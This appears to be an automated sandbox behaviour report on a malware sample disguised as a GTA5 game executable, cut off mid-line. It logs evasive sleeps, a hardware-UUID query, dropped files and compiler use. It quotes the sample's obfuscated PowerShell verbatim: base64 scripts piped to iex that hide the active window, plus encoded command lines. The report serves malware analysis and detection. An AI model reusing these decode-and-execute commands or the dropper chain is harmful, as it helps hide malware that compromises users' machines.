Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3309	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4866	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4604
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1198
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2699	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6116	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400	Thread sleep count: 3309 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400	Thread sleep count: 4866 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2764	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768	Thread sleep count: 4604 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828	Thread sleep count: 1198 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3376	Thread sleep count: 2699 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3376	Thread sleep count: 6116 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4672	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088	Thread sleep count: 98 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: GTA5-elamigos.exe, 00000000.00000003.2194226141.0000024F2035B000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2190739495.0000024F2035B000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2360531303.0000024F2035B000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2185696213.0000024F2035B000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2362453105.0000024F20343000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2362552637.0000024F20354000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2195583323.0000024F2035B000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2186981360.0000024F2035B000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2188013760.0000024F2035B000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2192086935.0000024F2035B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll25

Source: C:\Users\user\Desktop\GTA5-elamigos.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\GTA5-elamigos.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match	File source: amsi64_2860.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6784.amsi.csv, type: OTHER

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' \| ConvertFrom-Json).Script)) \| iex
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' \| ConvertFrom-Json).Script)) \| iex
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' \| ConvertFrom-Json).Script)) \| iex	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: Base64 decoded [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(('{"Script":"aWYgKC1ub3QgKFtTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTVHlwZU5hbWVdJ1dpbjMyJykuVHlwZSkgew0KICAgIEFkZC1UeXBlIEAiDQogICAgdXNpbmcgU3lzdGVtOw0KICAgIHVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsNCg0KICAgIHB1YmxpYyBjbGFzcyBXaW4zMiB7DQogICAgICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0NCiAgICAgICAgcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIEdldEZvcmVncm91bmRXaW5kb3coKTsNCg0KICAgICAgICBbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildDQogICAgICAgIFtyZXR1cm46IE1hcnNoYWxBcyhVbm1hbmFnZWRUeXBlLkJvb2wpXQ0KICAgICAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7DQogICAgfQ0KIkANCn0NCmZ1bmN0aW9uIEdldEFjdGl2ZVdpbmRvd1RpdGxlKCkgew0KICAgICRoV25kID0gW1dpbjMyXTo6R2V0Rm9yZWdyb3VuZFdpbmRvdygpDQogICAgJHNiID0gTmV3LU9iamVjdCBTeXN0ZW0uVGV4dC5TdHJpbmdCdWlsZGVyKDI1NikNCiAgICBbV2luMzJdOjpHZXRXaW5kb3dUZXh0KCRoV25kLCAkc2IsICRzYi5DYXBhY2l0eSkgfCBPdXQtTnVsbA0KICAgIHJldHVybiAkc2IuVG9TdHJpbmcoKQ0KfQ0KZnVuY3Rpb24gSGlkZUFjdGl2ZVdpbmRvdygpIHsNCiAgICAkaFduZCA9IFtXaW4zMl06OkdldEZvcmVncm91bmRXaW5kb3coKQ0KICAgIFtXaW4zMl06OlNob3dXaW5kb3coJGhXbmQsIDApDQp9DQokY3VycmVudFdpbmRvd1RpdGxlID0gR2V0QWN0aXZlV2luZG93VGl0bGUNCkhpZGVBY3RpdmVXaW5kb3cNCg=="}' \| ConvertFrom-Json).Script)) \| iex	Jump to behavior

Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAY	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAY	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" csproduct get uuid /value	Jump to behavior
Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Expand-Archive -Path \"C:\WindowsTasks\Updates\Update-m876kK3CBP.zip\" -DestinationPath \"C:\WindowsTasks\Platform\App-rRrqar5TwQ\"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\14ynqbdy\14ynqbdy.cmdline"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE4C.tmp" "c:\Users\user\AppData\Local\Temp\14ynqbdy\CSC1857152425CA4EAA8346B0B93220CD75.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jmxyvs0r\jmxyvs0r.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES12D9.tmp" "c:\Users\user\AppData\Local\Temp\jmxyvs0r\CSC50638E4E3C724DF29F41E118778681D.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\GTA5-elamigos.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encoded 